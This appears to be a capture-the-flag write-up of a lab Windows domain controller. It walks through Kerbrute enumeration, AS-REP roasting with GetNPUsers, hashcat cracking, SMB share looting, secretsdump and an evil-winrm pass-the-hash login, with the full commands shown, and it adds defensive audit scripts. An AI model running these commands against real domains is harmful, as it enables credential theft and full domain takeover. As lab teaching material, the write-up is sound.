AttacktiveDirectory

Casey Hillmann
6 min read · Apr 27, 2021

In this article I will demonstrate a pass-the-hash attack on a Windows Domain Controller, made possible by a user account that has Kerberos pre-authentication disabled.

Enumeration:

Running Nmap

nmap -A -T4 -p- -oG AD 10.10.84.174
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-22 16:28 EDT
Warning: 10.10.84.174 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.84.174
Host is up (0.11s latency).
Not shown: 65501 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-22 20:41:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2021-04-22T20:42:04+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-04-21T20:24:06
|_Not valid after: 2021-10-21T20:24:06
|_ssl-date: 2021-04-22T20:42:13+00:00; -2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7554/tcp filtered unknown
9389/tcp open mc-nmf .NET Message Framing
11012/tcp filtered unknown
20974/tcp filtered unknown
28728/tcp filtered unknown
39608/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49818/tcp open msrpc Microsoft Windows RPC
54462/tcp filtered unknown
59858/tcp filtered unknown
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-04-22T20:42:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 846.44 seconds

Nmap states that the domain name is spookysec.local. Before enumerating users with Kerbrute, the IP address and domain name need to be added to /etc/hosts.

Now that Kali resolves the name attached to the IP, we can use the domain name in the Kerbrute syntax. Kerbrute uses the Kerberos service to enumerate users from Active Directory, based on a provided username list.

./kerbrute userenum -d spookysec.local --dc spookysec.local /home/kali/users.txt -t 100

Once Kerbrute completes, it reports that user svc-admin does not require pre-authentication, and it was able to dump a hash that we can crack offline. When Kerberos pre-authentication is enabled, the client encrypts a current timestamp with a key derived from the user's password and sends it with its AS-REQ. When the KDC can decrypt that timestamp with the user's key and it is recent, it trusts that the request is genuine and not a replay. If pre-authentication is disabled, as found here, an attacker can send an AS-REQ for the user without knowing the password; the KDC answers with an AS-REP whose encrypted part is keyed by the user's password hash, and that material can be brute forced offline.
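As an added, defender-side example (not code from the original write-up): the condition Kerbrute found on svc-admin is the "Do not require Kerberos preauthentication" bit in the account's userAccountControl attribute. The script below decodes that attribute for a constructed set of accounts (names and values are assumed, not taken from the target) and lists which enabled accounts are exposed to this AS-REP request; the LDAP filter in the block is the query that finds the same accounts on a live directory.

```python
# Added defender-side audit, not code from the original write-up. The
# weakness Kerbrute found on svc-admin is the UF_DONT_REQUIRE_PREAUTH bit
# in the account's userAccountControl attribute; this decodes that attribute
# and lists the accounts that have it set. Flag values are the documented
# userAccountControl bits. Sample accounts below are constructed.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# The same check as an LDAP query (bitwise-AND matching rule on the
# attribute), for running against a live directory with ldapsearch.
LDAP_FILTER = ("(&(objectClass=user)"
               f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))")

# Constructed (sAMAccountName, userAccountControl) pairs, the shape an LDAP
# export of those two attributes gives. Values are assumed for illustration.
SAMPLE_USERS = [
    ("Administrator", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    ("svc-admin", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("backup", UF_NORMAL_ACCOUNT),
    ("old-svc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),
]


def preauth_disabled(uac: int) -> bool:
    """True when "Do not require Kerberos preauthentication" is set."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def asrep_roastable(users):
    """Enabled accounts that do not require pre-authentication.

    Disabled accounts are left out: the KDC rejects an AS-REQ for them
    (KDC_ERR_CLIENT_REVOKED) and returns no encrypted AS-REP to crack.
    """
    return [name for name, uac in users
            if preauth_disabled(uac) and not uac & UF_ACCOUNTDISABLE]


def audit_report(users):
    """Per-account summary; flags the setting on disabled accounts too, so it
    is cleaned up before someone re-enables the account."""
    return {name: {"preauth_disabled": preauth_disabled(uac),
                   "disabled": bool(uac & UF_ACCOUNTDISABLE),
                   "uac_hex": hex(uac)}
            for name, uac in users}


if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER)
    for name in asrep_roastable(SAMPLE_USERS):
        print(f"[!] {name}: enabled and pre-authentication not required")
```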

Exploitation:

Retrieving a hash to brute force is done with Impacket's GetNPUsers tool. Brute forcing the hash is then done by copying the entire hash into a text file and running it against a password list with Hashcat.

impacket-GetNPUsers spookysec.local/svc-admin -no-pass
TGT hash retrieved by GetNPUsers

To brute force the hash against a password list, copy the entire hash and paste it into a text file. For Hashcat to understand the type of hash being used we must determine the mode; this can be done by comparing our hash to the hash examples in the Hashcat wiki. According to the examples, our hash is a "Kerberos 5 AS-REP etype 23", and Hashcat uses mode 18200 for this hash type.

example_hashes [hashcat wiki]

Mode, hash type and hash example from Hashcat wiki
hashcat --force -m 18200 -a 0 hash.txt passwordlist.txt
Success brute force — password outlined in red.
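The mode lookup above is done by eye against the wiki; as an added example that is not part of the original write-up, the parser below reads the same information straight off the hash line GetNPUsers prints, in hashcat's $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata> layout. The sample line is constructed (its hex fields are filler, not ticket material); only etype 23 is mapped, since AES AS-REP lines use a different layout.

```python
# Added example (not from the original write-up): parse the AS-REP hash line
# that GetNPUsers prints, in hashcat's "$krb5asrep$<etype>$<user>@<REALM>:
# <checksum>$<edata>" layout, so the etype (and therefore the hashcat mode)
# is read from the line itself. The sample hash below is constructed; its
# hex fields are filler, not real ticket material.
import re

# Kerberos encryption type -> hashcat mode. 23 is RC4-HMAC, the case on this
# page; AES etypes (17/18) are printed in a different layout, not parsed here.
ASREP_MODES = {23: 18200}

SAMPLE = ("$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:"
          + "0123456789abcdef0123456789abcdef$" + "ab" * 40)

_PATTERN = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:$]+)"
    r":(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line: str) -> dict:
    """Split a hashcat-format AS-REP line into its fields.

    Raises ValueError for lines that do not match the layout, so a stray
    prompt or a John-format line (no etype field) is not fed to the wrong mode.
    """
    m = _PATTERN.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$<etype>$ hash line")
    etype = int(m["etype"])
    if etype == 23 and len(m["checksum"]) != 32:
        # RC4-HMAC carries a 16-byte HMAC-MD5 checksum -> 32 hex characters
        raise ValueError("etype 23 checksum must be 16 bytes")
    return {
        "etype": etype,
        "user": m["user"],
        "realm": m["realm"],
        "checksum": m["checksum"].lower(),
        "edata": m["edata"].lower(),
        "hashcat_mode": ASREP_MODES.get(etype),
    }


if __name__ == "__main__":
    info = parse_asrep_hash(SAMPLE)
    print(f"{info['user']}@{info['realm']}: etype {info['etype']} "
          f"-> hashcat -m {info['hashcat_mode']}")
```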

After obtaining a username and password, it's time to determine where these credentials can be used. Referring back to the Nmap output, port 445/tcp is open and might accept our credentials via smbclient. More enumeration is needed to determine what shares are available; this can be done with the -L switch.

smbclient -L \\\\10.10.9.158\\ -U svc-admin

Backup looks like an interesting share that can be accessed.

smbclient \\\\10.10.9.158\\backup -U svc-admin

Once connected, the dir command displays a text file.

Downloading file from the remote smb share to Kali.

The credentials appear to be encoded, a weak attempt to obfuscate the password.

To determine the type of hash, I used an online tool, which determined it was base64, as I suspected.

Hash Analyzer — TunnelsUP

Base64 can be easily decoded using the command below.

base64 -d <filename.txt>
Password outlined in red.

Now that another set of credentials has been obtained, it is possible to gain privileged access to this domain controller. Using another Impacket tool, secretsdump.py, it is possible to retrieve the password hashes that this user is permitted to sync from the domain controller. If retrieval is successful, a pass-the-hash attack may be possible.

secretsdump.py backup@spookysec.local

secretsdump.py successfully dumped the NTLM hashes of a large list of users. Focusing on the Administrator account, we can use Evil-WinRM to pass the NT hash and gain an administrator shell.

evil-winrm -i 10.10.9.158 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
